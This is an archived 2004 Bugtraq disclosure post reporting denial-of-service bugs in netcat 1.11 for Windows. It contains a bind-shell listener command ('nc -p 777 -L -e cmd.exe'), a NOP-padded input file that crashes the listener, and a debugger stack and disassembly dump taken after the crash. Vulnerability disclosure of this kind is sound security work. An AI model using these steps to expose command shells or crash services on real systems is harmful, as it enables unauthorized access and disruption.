NetCat V 1.11 Multiple Bugs
From: CorryL (corryl80_at_gmail.com)
Date: 12/30/04
- Previous message: Mandrake Linux Security Team: "MDKSA-2004:161 - Updated xpdf packages fix buffer overflow vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 30 Dec 2004 15:36:43 -0000 To: bugtraq@securityfocus.com('binary' encoding is not supported, stored as-is)
Hello the nc V1.11 is bugged
execute nc -p 777 -L -e cmd.exe
create te file prova.txt and insert
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90
execute nc 127.0.0.1 777 < prova.txt
Enjoy
0012FC18 00340D98 ASCII "cmd.exe"
0012FC1C 00000000
0012FC20 77F3372D RETURN to ntdll.77F3372D
0012FC24 77E21BFA RETURN to kernel32.77E21BFA from ntdll.ZwWaitForMultipleObjects
0012FC28 00000003
0012FC2C 0012FC6C
0012FC30 00000001
0012FC34 00000000
0012FC38 00000000
0012FC3C 77E2AF20 kernel32.CreateThread
0012FC40 00340C90
0012FC44 00000000
0012FC48 00000024
0012FC4C 00000001
0012FC50 00000000
77F3372D C2 1400 RETN 14
77F33730 90 NOP
77F33731 90 NOP
77F33732 90 NOP
77F33733 90 NOP
77F33734 90 NOP
77F33735 > B8 19010000 MOV EAX,119
77F3373A BA 0003FE7F MOV EDX,7FFE0300
77F3373F FFD2 CALL EDX
77F33741 C2 0C00 RETN 0C
77F33744 90 NOP
77F33745 90 NOP
77F33746 90 NOP
77F33747 90 NOP
77F33748 90 NOP
77F33749 > B8 1A010000 MOV EAX,11A
77F3374E BA 0003FE7F MOV EDX,7FFE0300
77F33753 FFD2 CALL EDX
77F33755 C2 0400 RETN 4
77F33758 90 NOP
77F33759 90 NOP
77F3375A 90 NOP
77F3375B 90 NOP
77F3375C 90 NOP
77F3375D > B8 1B010000 MOV EAX,11B
77F33762 BA 0003FE7F MOV EDX,7FFE0300
77F33767 FFD2 CALL EDX
77F33769 C2 0400 RETN 4
77F3376C 90 NOP
77F3376D 90 NOP
77F3376E 90 NOP
77F3376F 90 NOP
77F33770 90 NOP
77F33771 > B8 1C010000 MOV EAX,11C
77F33776 BA 0003FE7F MOV EDX,7FFE0300
77F3377B FFD2 CALL EDX
77F3377D C2 2400 RETN 24
the nc is blocked
another bug
nc -l -vv -p 4000
nc 127.0.0.1 4000 < nc.exe
the NetCat is Freezer
By CorryL
Admin www.x0n3-h4ck.tk Italian Security Team
- Previous message: Mandrake Linux Security Team: "MDKSA-2004:161 - Updated xpdf packages fix buffer overflow vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
